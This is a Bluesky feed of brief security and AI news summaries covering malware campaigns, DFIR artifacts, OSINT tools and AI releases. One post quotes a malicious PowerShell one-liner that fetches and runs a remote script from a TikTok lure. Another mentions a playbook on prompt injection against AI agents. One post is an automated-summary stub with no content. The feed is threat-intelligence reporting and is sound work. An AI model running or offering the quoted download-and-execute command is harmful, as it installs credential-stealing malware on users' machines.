Hasamba
@hasamba72.bsky.social
6 followers 20 following 130 posts
https://linktr.ee/yanivr
Posts Media Videos Starter Packs
Full AI Fundamentals 100 video (3+ hrs) from The Cyber Mentor: Intro to neural networks, NLP, LLMs and self-hosting LLMs. Free labs and a completion certificate are available via TCM Security Academy. #AI #LLMs #TCMSecurity https://bit.ly/3J3MISP
Self-hosted no-code scraper: Scraperr uses XPath extraction, domain spidering and media downloads; backend stores results in MongoDB and exposes APIs via FastAPI. #tool #webscraping https://bit.ly/4qAmPen
DPRK actor UNC5342 stores JavaScript payloads in smart contracts (Ethereum, BNB Smart Chain); loader retrieves via eth_call and delivers JADESNOW / INVISIBLEFERRET, enabling crypto theft and resilient C2. #EtherHiding #UNC5342 #JADESNOW https://bit.ly/4qlCSfY
ExCyTIn-Bench evaluates LLM agents on threat hunting with an interactive MySQL database and generated security Q&A tests; dataset on Hugging Face; evaluations updated with Qwen‑235B and Grok‑4. #tool #LLM #dataset https://bit.ly/4nbwRj0
TikTok lure uses PowerShell iex (irm slmgr.win/photoshop) to fetch a script (SHA256: 6D897B56...) that downloads AuroStealer (updater.exe) and a self‑compiling loader (source.exe). #aurostealer #tiktok #malware https://bit.ly/4o2w7y2
TikTok clips push a PowerShell one-liner that loads a malicious script (SHA256 6d897b...) leading to updater.exe (AuroStealer) and a self-compiling loader using csc.exe. #AuroStealer #PowerShell #TikTok https://bit.ly/4o2w7y2
Microsoft report: 52%+ of attacks with known motives tied to extortion/ransomware; 80% involved data theft; AI is accelerating phishing and malware development; MFA blocks >99% of identity attacks. #ransomware #MFA #AI https://bit.ly/3KTnFSY
Anthropic released Claude Skills: modular Markdown "skills" loaded on-demand via frontmatter YAML. Supports .pdf/.docx/.xlsx/.pptx, can run helper scripts (e.g., GIF builder) and checks like check_slack_size. #claude_skills #tool #anthropic https://bit.ly/3WJ2oOo
YouTube video "stealing passwords" (ID DhP2Hw-6DgY) is listed but metadata and technical indicators are not provided in the input. #password_theft #infosec https://bit.ly/42Jqegz
Netcraft uncovered Basic Auth phishing that embeds gmo-aozora[.]com in the username to spoof GMO Aozora; landing domains coylums[.], blitzfest[.], pavelrehurek[.] share /sKgdiq pages with a Japanese CAPTCHA. #phishing #basic_auth https://bit.ly/4n4m8GX
ClatScope aggregates Perplexity, HaveIBeenPwned, Hunter and RapidAPI for deep IP/domain/email recon; Mini edition requires no API keys; paid subscriptions include pre-provisioned, rotated API keys with usage tracking. #tool #OSINT https://bit.ly/4qeF34y
Pulseway RMM spotted in incidents: supports silent install and remote exec (CMD/PowerShell). Key artifacts: service 'PC Monitor', scheduled task 'PulsewayServiceCheck', registry HKLM\SOFTWARE\MMSOFT Design\PC Monitor. #Pulseway #RMM #DFIR https://bit.ly/4nXB3nQ
Agentic AI Red Teaming Playbook: end-to-end methods for agentic layers, covering prompt injection, RAG data exfiltration, tool-chaining, and exploitation techniques. Practical, battle-tested examples. #redteaming #AI #LLMsecurity https://bit.ly/3WEgBMw
Ducky bundles SSH/Telnet/Serial terminals, SNMP topology mapper, multi-threaded port scanner, subnet calculator and NIST CVE lookup into one PySide6 desktop GUI. #tool #python #snmp https://bit.ly/4n5vgLA
Public websites often hold API keys, DB strings, S3/GCS tokens and staging/admin URLs — the guide shows how these secrets are commonly discovered and why one leak can cascade into larger compromise. #infosec #osint #bugbounty https://bit.ly/4nKD8TT
Preconfigured Windows VM for DFIR investigations with a pinned DFIR_Toolbar and Explorer right-click integrations for artifact and disk-image parsing. Inspired by SIFT Workstation. #DFIR #WindowsForensics #tool https://bit.ly/3J6cZQb
ZeroTier builds a software-defined overlay with peer-to-peer direct connections, end-to-end encryption, and unique cryptographic IDs for device trust — targets IoT, SD‑WAN, and VPN use cases. #tool #zerotier https://bit.ly/3IK9ajP
Wyrm v0.3 Hatchling: Rust post‑exploitation C2 with HTTP(S) agents, custom below‑TLS encryption, dynamic payload staging and anti‑YARA IOCs. #tool #redteam https://bit.ly/4qbgQMz
Windows 11 Recall stores screenshots at %AppData%\Local\CoreAIPlatform...; Exif.Photo.MakerNote contains window title, path and timestamps; uses DiskANN DBs SemanticTextStore.sidb and SemanticImageS for search. #Windows11 #Recall #DFIR https://bit.ly/46NKIak
n8n workflow drives a Telegram AI agent that recognizes meals from photos, returns calorie and macro breakdowns, and logs results to a personal nutrition table. #n8n #Telegram #tool https://bit.ly/4haAUe6
Paper2Video turns a paper+image+audio into a presentation video via PaperTalker; key components: slide generation, subtitling, cursor grounding, speech synthesis, and talking‑head rendering. Released code and a HuggingFace dataset. #paper2video #tool https://bit.ly/4nJteBX
Claude Code now supports plugins bundling slash commands, subagents, MCP servers and hooks; installable via /plugin in public beta and discoverable via marketplaces using a claude-plugin/marketplace.json. #plugins #MCP #tool https://bit.ly/42AIFUG
Astaroth campaign uses .lnk→mshta to drop AutoIT files (Corsair.Yoga.06342.8476.366.log/.exe) and stack.tmp, exfiltrates via Ngrok, and pulls steganographic configs from GitHub images to maintain resilience. #Astaroth #GitHub #Ngrok https://bit.ly/4qcZi2W
Schneider's PANDA pilot uses the OpenAI API with RAG to query internal protocol DBs and deliver grounded pediatric decision support at the bedside. Designed to prevent hallucinations. #AI #ChatGPT #tool https://bit.ly/4712Zj9
Injection into antivirus-protected processes used to drop backdoors into AV install folders; defenses include Protected Process Light (PPL), SYSTEM privileges, process introspection, ImagePath validation and DLL signing. #antivirus #PPL #process_injection https://bit.ly/4h4FLxg